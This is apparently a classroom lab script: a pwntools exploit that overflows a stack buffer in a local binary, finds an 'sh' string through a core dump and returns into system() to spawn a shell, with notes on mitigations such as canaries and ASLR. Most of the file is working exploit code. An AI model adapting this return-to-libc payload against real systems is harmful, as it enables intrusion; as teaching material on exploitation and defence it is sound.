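#!/usr/bin/env python
"""Lab walkthrough: stack overflow in ./1-dep-2 turned into a return-to-libc call.

Root cause (per the gdb note below): input_func copies attacker-controlled input
into a 0x88-byte stack buffer without a length check, so the saved ebp and the
return address that follow it are overwritten. The binary name suggests the
stack is non-executable (DEP/NX), which is why the exercise returns into
system() instead of into injected code.

Two runs are made: the first deliberately crashes the program so its core dump
reveals where an "sh" string lives on the stack; the second reuses that address
together with the (hand-filled) address of system().

Defensive takeaways for the class: a bounded read fixes the bug itself; a stack
protector (canary) would abort before the corrupted return address is used; and
ASLR/PIE would invalidate the hard-coded addresses used here (presumably the
lab runs with a fixed layout -- confirm in the lab setup).
"""
from pwn import *

# --- run 1: crash the target to obtain a core dump -------------------------

# open a process
p = process("./1-dep-2")

# Check the buffer info from gdb - disas input_func
# -0x88(%ebp)...

# prepare a payload to crash
# [ buffer (0x88) ][ saved ebp ][ ret ]
payload = b"A" * 0x88 + b"BBBB" + b"CCCC"  # ret = 0x43434343, guaranteed invalid
p.send(payload)
p.wait()  # block until the child dies; the kernel writes its core dump
p.close()  # release the pty/pipes of the crashed child before re-spawning

# Let's get the address of 'sh'
# NOTE(review): assumes a core file literally named 'core' appears in the
# working directory (depends on `ulimit -c` and core_pattern) -- confirm.
c = Core('core')
addr_of_sh = c.stack.find('sh')
# NOTE(review): if 'sh' is not present in the stack mapping, find() does not
# yield a usable address and the payload below would be built from garbage;
# check the printed value before trusting it.
print("Stack %s" % hex(addr_of_sh))

# --- run 2: return into system() -------------------------------------------

# Let's run system...
# get the address from gdb - by running 'b main', 'run', 'print system'
addr_system = None  # PLACEHOLDER: set this to the value gdb prints for system
if addr_system is None:
    raise SystemExit("addr_system is unset: fill it in from gdb ('b main', 'run', 'print system')")

p = process("./1-dep-2")

# Stack layout after the overflow:
# [ buffer (0x88) ][ saved ebp ][ ret ]
# [ buffer (0x88) ][ saved ebp ][ system() ][ XXXX ][ addr_of_sh ]
# 'XXXX' is the return address system() itself will use once it finishes;
# this script reuses addr_system there, and pads with a second addr_of_sh.
payload = (
    b"A" * 0x88
    + b"BBBB"
    + p32(addr_system)  # address of system...
    + p32(addr_system)  # XXXX: what system() returns to
    + p32(addr_of_sh)   # argv for system(): pointer to "sh" found in the core
    + p32(addr_of_sh)
)
p.send(payload)
p.interactive()
quit()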